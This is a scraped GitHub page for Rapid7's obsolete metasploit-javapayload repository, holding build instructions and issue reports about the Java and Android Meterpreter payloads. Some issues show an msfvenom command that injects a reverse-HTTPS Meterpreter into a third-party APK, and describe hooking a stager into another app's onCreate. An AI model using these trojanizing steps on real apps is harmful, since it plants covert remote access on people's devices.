rapid7 / metasploit-javapayload Goto Github PK

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Java 95.98% Makefile 0.06% C 0.80% HTML 2.62% Ruby 0.55%

metasploit-javapayload's Introduction

This repository has been merged into metasploit-payloads

Please note that this repository has been merged into a unified repository for meterpreters: https://github.com/rapid7/metasploit-payloads

The history has been preserved, along with prehistory from metasploit-framwork: https://github.com/rapid7/metasploit-payloads/tree/master/java

If you have any old PRs, please rebase them on the new repository. See rapid7/meterpreter#110 for discussion of why we merged these repositories back together.

Build Instructions

To compile JavaPayload for Metasploit (including Java Meterpreter), you need Maven 3.0 or above. Just run

mvn package

to package all the files, or

mvn -P deploy package

to package all the files and copy them into the correct place for Metasploit (../metasploit-framework/data/java). If you get spurious compilation errors, make sure that there is an exclude rule in your antivirus for the Metasploit directory (or that your antivirus is disabled).

If the path to your metasploit framework repository is not ../metasploit-framework, but for example ../msf3, use

mvn -D deploy.path=../msf3 -P deploy package

In case you want to edit/debug JavaPayload for Metasploit or Java Meterpreter, Maven provides plugins to auto-generate project files for your favourite IDE (at least for Eclipse, Netbeans or IntelliJ). I use Eclipse, so to generate project files I use

mvn eclipse:eclipse

This will generate project files that can be imported via

File->Import->Existing Projects into Workspace

into your Eclipse workspace.

(Note that if this is your first Maven project you want to use in Eclipse, you also have to run

mvn -Declipse.workspace=/path/to/your/workspace eclipse:configure-workspace

to set up path variables like M2_REPO to point to the correct location.)

For NetBeans or IntelliJ IDEA, refer to the documentation at

http://maven.apache.org/netbeans-module.html http://maven.apache.org/plugins/maven-idea-plugin/

Android

Download the Android SDK, and the Android NDK somewhere
Launch the sdk/tool/android program
Install API version 10, and update the "Android SDK Tools" and "Android SDK Platform-tools"
Compile android meterpreter:

mvn package -Dandroid.sdk.path=/path/to/android-sdk -Dandroid.ndk.path=/path/to/android-ndk -Dandroid.release=true -P deploy

metasploit-javapayload's People

Contributors

Stargazers

Watchers

Forkers

schierlm anwarmohamed manicstreetcoders timwr jvazquez-r7 jlee-r7 jubaisamurai pwntester mohmedmedhat ka1han d3ads0ul jvennix-r7 chuacw f0restw0w todb-r7 baldybadgersrunningroundmybrain smile921 winny11 danielhuntley313 alex-metasploit aczire 0x0mar intointel iteamdevelopers charles1024 ritzygirl mohammadpourshojaie jack64 melbshark digideskio rohitshampur brztit deenjohn gitmine networkwebmasters mattlk13 njseclab violethydra xiaohuanshu noorqureshi oscommonjs denniscaudell ritsparsa rlygoodrly corleanus aydgelee kamleshahire lorinwu iblisbuu wolfmmd pemrick79 iwan7teen hykelauncher nestorperez13 isabella232 soxueren xraydar ben56 richizo michael33n bulksecuritygeneratorprojectv2 vinnyvinoth

metasploit-javapayload's Issues

post/test/meterpreter is failing on Android

The post/test/meterpreter module is currently (as of 4830dff) failing on Android, but passing on java.

msf exploit(handler) > use post/test/meterpreter 
msf post(meterpreter) > set session 1
session => 1
msf post(meterpreter) > run

[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_fs_file_expand_path: Operation failed: 1
[-] Call stack:
[-]   /home/user/dev/git/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb:139:in `expand_path'
[-]   /home/user/dev/git/metasploit-framework/test/modules/post/test/meterpreter.rb:41:in `setup'
[*] Post module execution completed

Getsystem on Windows

It would be great if the Java meterpreter could have the ability to getsystem when it is deployed on a Windows system.

This is very useful when exploiting Java based vulnerabilities in the browser.

Error when i modify an apk

Hi, i want to modify an apk, so i do that : msfvenom -x APKPure_v3.17.29_apkpure.com.apk -p android/meterpreter/reverse_https LHOST=My_IP LPORT=443 -o apkpure.apk
But I have this error :

W: /tmp/d20211107-1355-1vbcgal/original/res/layout-v22/material_timepicker_dialog.xml:2: error: No resource identifier found for attribute 'accessibilityPaneTitle' in package 'android' W: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_72762702050430616616466299950788491245.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 28, --version-code, 3172901, --version-name, 3.17.29, --no-version-vectors, -F, /tmp/APKTOOL281962750424967257.tmp, -e, /tmp/APKTOOL17564809524669596266.tmp, -0, arsc, -I, /home/imprevisible/.local/share/apktool/framework/1.apk, -S, /tmp/d20211107-1355-1vbcgal/original/res, -M, /tmp/d20211107-1355-1vbcgal/original/AndroidManifest.xml] Error: Unable to rebuild apk with apktool
How can i path that

Java Meterpreter process.execute and arguments

Issue rapid7/meterpreter#98 is really a Java thing, but was opened over there so the links from Redmine would work as expected.

What actually should happen is some more sane and thoughtful naming of this repo, or have everything be a subproject of rapid7/meterpreter, or something. I know we talked about this, but that's way beyond the scope of this bug.

Intermittent testShellStage failure

When building this repository the tests sometimes fail like so:

-------------------------------------------------------
 T E S T S
-------------------------------------------------------
Running javapayload.stage.MeterpreterTest
Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.348 sec
Running javapayload.stage.ShellTest
Tests run: 1, Failures: 1, Errors: 0, Skipped: 0, Time elapsed: 0.002 sec <<< FAILURE!
testShellStage(javapayload.stage.ShellTest)  Time elapsed: 0.002 sec  <<< FAILURE!
junit.framework.AssertionFailedError: MagicToken missing in shell output: 
    at junit.framework.Assert.fail(Assert.java:47)
    at junit.framework.Assert.assertTrue(Assert.java:20)
    at javapayload.stage.ShellTest.testShellStage(Unknown Source)
Running metasploit.PayloadTest
Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2.717 sec
Results :
Failed tests:   testShellStage(javapayload.stage.ShellTest): MagicToken missing in shell output:

As seen here:
https://travis-ci.org/rapid7/metasploit-javapayload/jobs/27319619

This bug is intermittent so it's difficult to ping down what's causing it. The work-around is to rebuild, as it appear to occur about 1 in 10 tries.

@schierlm recommended here: #17 that we increase the timeout.

Android Meterpreter Reverse HTTPS failure

I've been using the android stager files Payload.java and PayloadTrustManager.java to "patch" other apps (then hooking onCreate() with Payload.startInPath(getApplicationContext().getFilesDir().toString()); ) and it's working using reverse_tcp, but now I'm trying to use reverse_https and I'm getting an error: java.lang.ClassNotFoundException: com.metasploit.stage.PayloadTrustManager at Payload.loadStage(Payload.java:146), so I'm guessing it's failing because it's trying to use the PTM that's usually inside the generated apk, but since I'm not using the generated apk but adding the stager java files to another apk manually, I don't suppose there's a way I can tell meterpreter to look for that class inside an arbitrary package? For the stager, I changed the package name on both Payload.java and PayloadTrustManager.java so that the Payload.startInPath(getApplicationContext().getFilesDir().toString()); hook worked, perhaps this must be done on the stage side as well.
Here's some more logcat stuff:

Caused by: java.lang.ClassNotFoundException: Didn't find class com.metasploit.stage.PayloadTrustManager" on path: DexPathList[[zip file  "/data/data/com.instagram.android/files/met.jar"],nativeLibraryDirectories=/data/data/com.instagram.android/files, /vendor/lib, /system/lib]]

I tried to trace the rest of the logcat errors and ended up on https://github.com/rapid7/metasploit-javapayload/blob/master/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java at line 196:

Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});

where getPayloadTrustManager() is defined as:

protected String getPayloadTrustManager() {
        return "com.metasploit.meterpreter.PayloadTrustManager";
    }

maybe that's the problem.
My test phone is a Samsung Galaxy S4 (i9505), OS: Android 5.0.1 - Linux 3.4.0-4760392 (armv7l) and my metasploit framework is the latest GIT version .
I've also been getting Failed to load extension: No module of the name ext_server_android.jar found even with the msfvenom generated APKs, but that's another issue altogether.

If there's any other information you'd like me to provide regarding this issue please let me know.

Thanks and keep up the great work !

Meterpreter apk receives "INSTALL_PARSE_FAILED_NO_CERTIFICATES" error.

I've tried recently to use the android meterpreter (reverse_tcp, http and https), and all apk generated from msfpayload give out the same error on install (be it through adb or direct install on the phone). The error is "INSTALL_PARSE_FAILED_NO_CERTIFICATES", on both Samsung Galaxy S4 LTE-A's CyanogenMod11 and Alcatel One Touch stock 4.4.2.
I do not know if the problem lies with the android meterpreter itself or msfpayload.

Making msfpayload take into account added res files.

Hi,
I am working on a security threat awareness demo, focusing on BYOD and everything mobile.
I was wondering if there is an easy way to add a display to the Android Meterpreter (no actual app, but just change the Launch Activity to display simple things).
I tried modifying it just to display a background image, but even such a tiny modification, even thought compilation goes well, msf does not seem to include the picture in the final apk.

Extensions Architecture

Can't we make an architecture for extensions instead of loading all meterpreter commands all in time. just like those in the native meterpreter repo

Java Meterpreter fails to stat the root directory when given more than one /

meterpreter > ls //
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cat ...
java.lang.StringIndexOutOfBoundsException: String index out of range: 0
   at java.lang.String.charAt(libgcj.so.81)
   at java.io.File._stat(libgcj.so.81)
   at java.io.File.isHidden(libgcj.so.81)
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.stat(Unknown Source)
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.execute(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.executeCommand(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at java.lang.reflect.Constructor.newInstance(libgcj.so.81)
   at javapayload.stage.Meterpreter.start(Unknown Source)
   at java.lang.reflect.Method.invoke(libgcj.so.81)
   at metasploit.Payload.bootstrap(Unknown Source)
   at metasploit.Payload.main(Unknown Source)
java.io.IOException: File/directory does not exist: //
   at com.metasploit.meterpreter.stdapi.stdapi_fs_stat.execute(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.executeCommand(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at com.metasploit.meterpreter.Meterpreter.<init>(Unknown Source)
   at java.lang.reflect.Constructor.newInstance(libgcj.so.81)
   at javapayload.stage.Meterpreter.start(Unknown Source)
   at java.lang.reflect.Method.invoke(libgcj.so.81)
   at metasploit.Payload.bootstrap(Unknown Source)
   at metasploit.Payload.main(Unknown Source)

Java HTTP(S) problems

I'm currently noticing some weirdness with java/meterpreter/reverse_http and reverse_https (reverse_tcp works great). e.g:

payload => java/meterpreter/reverse_http
lhost => 172.16.197.79
lport => 4444
ExitOnSession => false
[*] Exploit running as background job.

[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
msf exploit(handler) > [*] 172.16.197.79:39083 (UUID: 684788547e5d8a86/java=17/java=4/2015-05-08T07:13:24Z) Staging Java payload ...
[*] Meterpreter session 1 opened (172.16.197.79:4444 -> 172.16.197.79:39083) at 2015-05-08 08:13:24 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls
[-] Unknown command: ls.
meterpreter > ls

Listing: /home/user/dev/git/metasploit-framework
================================================
<snip>

After the initial weirdness things seem to work, but commands also seem to take a lot longer, so I suspect there is a timeout problem somewhere.

I also noticed this, however I can no longer reproduce:

payload => java/meterpreter/reverse_https
HandlerSSLCert => correct.pem
StagerVerifySSLCert => true
lhost => 172.16.197.79
lport => 4444
ExitOnSession => false
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
msf exploit(handler) > [*] 172.16.197.79:39936 (UUID: 3d6ea094545c7028/java=17/java=4/2015-05-08T04:26:04Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 1 opened (172.16.197.79:4444 -> 172.16.197.79:39936) at 2015-05-08 06:33:41 +0100
[*] 172.16.197.79:39938 (UUID: cb00083855c7f36e/java=17/java=4/2015-05-08T05:33:48Z) Staging Java payload ...
[*] Meterpreter session 2 opened (172.16.197.79:4444 -> 172.16.197.79:39938) at 2015-05-08 06:33:48 +0100

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter java/java               172.16.197.79:4444 -> 172.16.197.79:39936 (172.16.197.79)
  2   meterpreter java/java               172.16.197.79:4444 -> 172.16.197.79:39938 (172.16.197.79)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /home/user/dev/git/metasploit-framework
================================================

<snip>

I'll hopefully fix this with the addition of the set_timeout command, but I thought I'd raise it here for visibility.

Hashdump on Windows

It would be great if the Java meterpreter could have the ability to hashdump when it is deployed on a Windows system.